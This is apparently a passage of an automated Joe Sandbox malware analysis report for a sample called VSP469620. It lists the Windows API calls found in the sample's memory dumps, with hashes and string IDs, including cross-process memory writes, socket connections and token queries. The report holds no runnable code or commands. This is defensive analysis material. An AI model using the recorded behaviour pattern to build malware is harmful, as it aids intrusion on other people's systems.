• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 6a09a45d47b7f5f3d812a215610816f994672ddc108828e02b583ebeab595e4f
• Instruction ID: 29fdbf5b9a519798619687c0c68251ce3d9db9b08a9f6f7ea1c32caffde2592e
• Opcode Fuzzy Hash: 6a09a45d47b7f5f3d812a215610816f994672ddc108828e02b583ebeab595e4f
• Instruction Fuzzy Hash: F221C335610648BADB10AF6A9D8AFDF7AA8AF89750F100025F906EB182DB74CD0587B1
APIs
  • Part of subcall function 00AB50E6: _wcsncpy.LIBCMT ref: 00AB50FA
• GetFileAttributesW.KERNEL32(?,?,?,?,00AF60C3), ref: 00AF6369
• GetLastError.KERNEL32(?,?,?,00AF60C3), ref: 00AF6374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00AF60C3), ref: 00AF6388
• _wcsrchr.LIBCMT ref: 00AF63AA
  • Part of subcall function 00AF6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00AF60C3), ref: 00AF63E0
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: a2e9ae0668eb2d9a84f7c9dea7e9739935b2179349d45a6a97a6405f076c9b74
• Instruction ID: 7cacb66857bfdaf2ed4a54a88073ec0b97a9e95de07a0825a51602f4121bb319
• Opcode Fuzzy Hash: a2e9ae0668eb2d9a84f7c9dea7e9739935b2179349d45a6a97a6405f076c9b74
• Instruction Fuzzy Hash: 9A21EB3190461D5BDF15ABB8AD42FFE336CEF19360F20056AF245DB1C1EF60D9848A55
APIs
  • Part of subcall function 00B0A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B0A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B08BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00B08BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00B08BFE
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
• Opcode ID: aa1f2d0dd48948c14bce6c155450c120c90dc3b02ed1c368de47a28d49128cd9
• Instruction ID: ba5f834d98fd955edbaa04577714b8012752e7d85bb27ca317dac0160549181f
• Opcode Fuzzy Hash: aa1f2d0dd48948c14bce6c155450c120c90dc3b02ed1c368de47a28d49128cd9
• Instruction Fuzzy Hash: 6A215E312042149FDB10AF68DA85F7E7BE9EF48720F14845DF956AB2D2CF74AD018B51
APIs
• IsWindow.USER32(00000000), ref: 00B08441
• GetForegroundWindow.USER32 ref: 00B08458
• GetDC.USER32(00000000), ref: 00B08494
• GetPixel.GDI32(00000000,?,00000003), ref: 00B084A0
• ReleaseDC.USER32(00000000,00000003), ref: 00B084DB
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 6628be2c7b74bce54d375ea66b18bce681c17250ff9afab4fd23fbd17e9d998a
• Instruction ID: aea90421d959c6ba3676f35a89cf1d3f3227edd7452f38d35e2528842effb6fb
• Opcode Fuzzy Hash: 6628be2c7b74bce54d375ea66b18bce681c17250ff9afab4fd23fbd17e9d998a
• Instruction Fuzzy Hash: BE214F75A00204AFD700DFA4D985AAEBBF9EF48341F148479F95A97352DE74AD00CB60
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ACAFE3
• SelectObject.GDI32(?,00000000), ref: 00ACAFF2
• BeginPath.GDI32(?), ref: 00ACB009
• SelectObject.GDI32(?,00000000), ref: 00ACB033
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 8cab5d6a0a28864077c1485744d115fa11fc095069885f2d311972748aaf6260
• Instruction ID: 3e5ae14ef1f0e2055bc74006098021ddef4a3615f8db22e4cfeca709d1a7d76e
• Opcode Fuzzy Hash: 8cab5d6a0a28864077c1485744d115fa11fc095069885f2d311972748aaf6260
• Instruction Fuzzy Hash: C621AFB0810209EFDB10DF6DEC49BAA7B78BB20355F14461EE429A70A0CB718995DBA0
APIs
• __calloc_crt.LIBCMT ref: 00AD21A9
• CreateThread.KERNEL32(?,?,00AD22DF,00000000,?,?), ref: 00AD21ED
• GetLastError.KERNEL32 ref: 00AD21F7
• _free.LIBCMT ref: 00AD2200
• __dosmaperr.LIBCMT ref: 00AD220B
  • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
• Opcode ID: 8359dc8456f1610304e010fb005034878108776c4a4269542be3575aebb177d9
• Instruction ID: dce9ebd51f88a62940e51c428f09d3db930a3f7ec9d41c609ed57faefadbbe9e
• Opcode Fuzzy Hash: 8359dc8456f1610304e010fb005034878108776c4a4269542be3575aebb177d9
• Instruction Fuzzy Hash: 4A110433104306AF9B15AFA5ED42EAF3BA8EF50770B10052BF91687391EB31C811C7A0
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AEABD7
                                                              • GetLastError.KERNEL32(?,00AEA69F,?,?,?), ref: 00AEABE1
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00AEA69F,?,?,?), ref: 00AEABF0
                                                              • HeapAlloc.KERNEL32(00000000,?,00AEA69F,?,?,?), ref: 00AEABF7
                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AEAC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              APIs
                                                              • CLSIDFromProgID.OLE32 ref: 00AE9ADC
                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00AE9AF7
                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00AE9B05
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00AE9B15
                                                              • CLSIDFromString.OLE32(?,?), ref: 00AE9B21
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7A74
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AF7A82
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7A8A
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AF7A94
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AEAADA
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAAE4
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAAF3
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAAFA
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAB10
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AEAA79
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AEAA83
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AEAA92
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AEAA99
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AEAAAF
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00AEEC94
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AEECAB
                                                              • MessageBeep.USER32(00000000), ref: 00AEECC3
                                                              • KillTimer.USER32(?,0000040A), ref: 00AEECDF
                                                              • EndDialog.USER32(?,00000001), ref: 00AEECF9
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 00ACB0BA
                                                              • StrokeAndFillPath.GDI32(?,?,00B2E680,00000000,?,?,?), ref: 00ACB0D6
                                                              • SelectObject.GDI32(?,00000000), ref: 00ACB0E9
                                                              • DeleteObject.GDI32 ref: 00ACB0FC
                                                              • StrokePath.GDI32(?), ref: 00ACB117
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00AFF2DA
                                                              • CoCreateInstance.OLE32(00B3DA7C,00000000,00000001,00B3D8EC,?), ref: 00AFF2F2
                                                              • CoUninitialize.OLE32 ref: 00AFF555
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              APIs
                                                                • Part of subcall function 00AB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB53B1,?,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB662F
                                                              • CoInitialize.OLE32(00000000), ref: 00AFE85D
                                                              • CoCreateInstance.OLE32(00B3DA7C,00000000,00000001,00B3D8EC,?), ref: 00AFE876
                                                              • CoUninitialize.OLE32 ref: 00AFE893
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00AD32ED
                                                                • Part of subcall function 00ADE0D0: __87except.LIBCMT ref: 00ADE10B
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              APIs
                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B4DC50,?,0000000F,0000000C,00000016,00B4DC50,?), ref: 00AF4645
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AF46C5
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                              • String ID: REMOVE$THIS
                                                              • API String ID: 3797816924-776492005
                                                              APIs
                                                                • Part of subcall function 00AF430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AEBC08,?,?,00000034,00000800,?,00000034), ref: 00AF4335
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AEC1D3
                                                                • Part of subcall function 00AF42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AEBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00AF4300
                                                                • Part of subcall function 00AF422F: GetWindowThreadProcessId.USER32(?,?), ref: 00AF425A
                                                                • Part of subcall function 00AF422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AEBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00AF426A
                                                                • Part of subcall function 00AF422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AEBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00AF4280
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AEC240
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AEC28D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 9cf3078befc41181f45eff38fc309bc85509ae8a8b399836ea1ad22b28049cfb
                                                              • Instruction ID: 6c8dee348b9ab9447db3f3a79dfb07555bb1c30f44609cc9732546326eaef546
                                                              • Opcode Fuzzy Hash: 9cf3078befc41181f45eff38fc309bc85509ae8a8b399836ea1ad22b28049cfb
                                                              • Instruction Fuzzy Hash: CF41497690021CAFDB10EFA4CD82EEEBBB8BF09310F104195FA55B7181DA71AE45CB61
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B4DC00,00000000,?,?,?,?), ref: 00B1A6D8
                                                              • GetWindowLongW.USER32 ref: 00B1A6F5
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B1A705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: e12370a5bcc5bd9093c52649f6404f0b6de66281eca466992a0cb5181c551b28
                                                              • Instruction ID: b29db7f96a5b632d113c53056d8ec86626cdcaf09b7c2c1453f59e7d40f0ff10
                                                              • Opcode Fuzzy Hash: e12370a5bcc5bd9093c52649f6404f0b6de66281eca466992a0cb5181c551b28
                                                              • Instruction Fuzzy Hash: 9031AF31201605AFDB118F38DC41BEA77A9FB49324F254769F879932E0DB70ED909B60
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B1A15E
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B1A172
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B1A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 5e68809beaa652c88774b9d7631938edda3644126c3819ffb0fa1a4d80e701b0
                                                              • Instruction ID: 7d65bb85836cae1ca59e5600d791d6d8d93bbc2a0231a4825ecc41d482b4329e
                                                              • Opcode Fuzzy Hash: 5e68809beaa652c88774b9d7631938edda3644126c3819ffb0fa1a4d80e701b0
                                                              • Instruction Fuzzy Hash: F4217E32510218BBDF118E94CC42FEA3BA9EF49714F110254FA557B190D675A8958BA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B1A941
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B1A94F
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B1A956
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: f6b93e9573cd47ccef1f78abdf0b8e9d048e246c3a1caab885db22749f388bdd
                                                              • Instruction ID: 2a79cdb2559235f3f6488ceebe75be50f4e7ae875005e04289fb50c6dd9cb2f9
                                                              • Opcode Fuzzy Hash: f6b93e9573cd47ccef1f78abdf0b8e9d048e246c3a1caab885db22749f388bdd
                                                              • Instruction Fuzzy Hash: 93218EB5600209AFDB10DF28DCD2DA737EDEB5A3A4B450599FA149B261CB30EC918B61
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B19A30
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B19A40
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B19A65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 364352712c94ecff65408fb33bafc2f63dcca4661c7d56bbf97f4c07c2a1509b
                                                              • Instruction ID: 49c39b7fee10b236b365f5cf58aefad54cd8ccbc6630480ff2ddb02b133dd228
                                                              • Opcode Fuzzy Hash: 364352712c94ecff65408fb33bafc2f63dcca4661c7d56bbf97f4c07c2a1509b
                                                              • Instruction Fuzzy Hash: 0E21C232610118BFDB218F54DC95FFF3BEAEF89790F518168F9549B1A0CA719C9187A0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B1A46D
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B1A482
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B1A48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: fb6e3c9a13379c7bc40a381e959827659894e50984239306d9472721dab26a1a
                                                              • Instruction ID: fa065b1ac3fbff059537aa65847efb7208c6bccfa4891cb6319d9fcbdc179369
                                                              • Opcode Fuzzy Hash: fb6e3c9a13379c7bc40a381e959827659894e50984239306d9472721dab26a1a
                                                              • Instruction Fuzzy Hash: 54110A71200208BEEF205F65CC46FEB3BA9EF89754F024128FA5596191D6B1E851C720
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AD2350,?), ref: 00AD22A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00AD22A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 2574300362-340411864
                                                              • Opcode ID: 7b962b2c9b6004b148e38627259da5cfda7022d0f289e4b72e9f24fb16f3043b
                                                              • Instruction ID: 42a3ac2ecb36815ea723a5ef2cde3a44bafb233ed53cfa2228e29361a1928805
                                                              • Opcode Fuzzy Hash: 7b962b2c9b6004b148e38627259da5cfda7022d0f289e4b72e9f24fb16f3043b
                                                              • Instruction Fuzzy Hash: 20E0E5706A4302ABDA106F70ED49B5936A4A710702F604065F206F75E0CFB84090DF04
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AD2276), ref: 00AD2376
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00AD237D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
